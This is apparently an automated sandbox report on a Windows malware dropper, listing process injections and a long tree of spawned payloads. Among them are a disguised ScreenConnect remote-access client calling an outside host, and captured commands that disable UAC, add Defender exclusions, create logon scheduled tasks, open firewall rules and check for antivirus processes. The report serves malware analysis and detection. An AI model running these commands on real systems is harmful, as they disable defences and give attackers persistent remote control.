Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4556 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 4556 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 4556 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 4556 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 4556 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 3824 wrote to memory of 1900 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3824 wrote to memory of 1900 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 5052 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 5052 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 5052 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 5052 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 5052 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 5052 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 1900 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 1900 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 1900 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2680 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 1900 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 1900 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 1900 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
PID 1900 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
PID 1900 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
PID 3676 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 3676 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 3676 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 1900 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
PID 1900 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
PID 1900 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
PID 4136 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Windows\system32\svchost.exe
PID 1900 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Windows\system32\svchost.exe
PID 1900 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Windows\system32\svchost.exe
PID 1828 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1828 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1828 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4136 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\WScript.exe
PID 4136 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\WScript.exe
PID 4136 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\WScript.exe
PID 5052 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\system32\Windows Shell Interactive.exe
PID 5052 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\system32\Windows Shell Interactive.exe
PID 5052 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\system32\Windows Shell Interactive.exe
PID 2392 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe
PID 2392 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe
PID 2392 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe
PID 1900 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\T.exe
PID 1900 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\T.exe
PID 1900 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\T.exe
PID 4572 wrote to memory of 4496 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4572 wrote to memory of 4496 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4572 wrote to memory of 4496 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2436 wrote to memory of 4920 N/A C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
PID 2436 wrote to memory of 4920 N/A C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
PID 2436 wrote to memory of 4920 N/A C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
PID 5052 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe
PID 5052 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe
PID 5052 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe
PID 4496 wrote to memory of 4480 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 4496 wrote to memory of 4480 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 4496 wrote to memory of 4480 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\a\1.exe

"C:\Users\Admin\AppData\Local\Temp\a\1.exe"

C:\Users\Admin\AppData\Local\Temp\a\test.exe

"C:\Users\Admin\AppData\Local\Temp\a\test.exe"

C:\Users\Admin\AppData\Local\Temp\a\Update.exe

"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd

C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe

"C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"

C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe

"C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"

C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe

"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\a\windows.exe

"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe

"C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe"

C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe

"C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe" -burn.filehandle.attached=688 -burn.filehandle.self=540

C:\Users\Admin\AppData\Local\Temp\a\T.exe

"C:\Users\Admin\AppData\Local\Temp\a\T.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 1347DC49D48561C4A02CAEABAB78B4B1 C

C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe

C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe

C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe

"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC10E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240632515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe

C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"

C:\Users\Admin\AppData\Local\Temp\a\access.exe

"C:\Users\Admin\AppData\Local\Temp\a\access.exe"

C:\ProgramData\Bitdefender\$77-Bitdefender.exe

C:\ProgramData\Bitdefender\$77-Bitdefender.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "opssvc wrsa"

C:\Users\Admin\AppData\Local\Temp\a\36.exe

"C:\Users\Admin\AppData\Local\Temp\a\36.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4552 -ip 4552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 364

C:\Users\Admin\AppData\Local\Temp\a\99999.exe

"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"

C:\Users\Admin\AppData\Local\Temp\a\22.exe

"C:\Users\Admin\AppData\Local\Temp\a\22.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD1C7.tmp.bat""

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe

"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"

C:\Users\Admin\AppData\Local\Temp\a\Network.exe

"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\rea.exe

"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe

"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpEF71.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF50F.tmp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e6TONnwlRjZT.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 812A33CB12312E6462786B39941DA2A5

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 8849EAC97ADA90BEB9C92DE240009D0C E Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=a205822a-25dd-4182-ae48-34f1f8dfcbcd&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "791a6c20-0820-417e-b3aa-8d215157e49c" "User"

C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe

"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'

C:\Users\Admin\AppData\Local\Temp\a\mod.exe

"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"

C:\Users\Admin\AppData\Local\Temp\a\Server.exe

"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "d3f4f0ef-3603-4e14-afcf-b85b775e7c43" "System"

C:\Users\Admin\AppData\Local\Temp\a\Client.exe

"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Local\Temp\a\jij.exe

"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"

C:\Users\Admin\AppData\Local\Temp\a\333.exe

"C:\Users\Admin\AppData\Local\Temp\a\333.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SdKVUC2UF3Oy.bat" "

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xnAULEnVoqrp.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

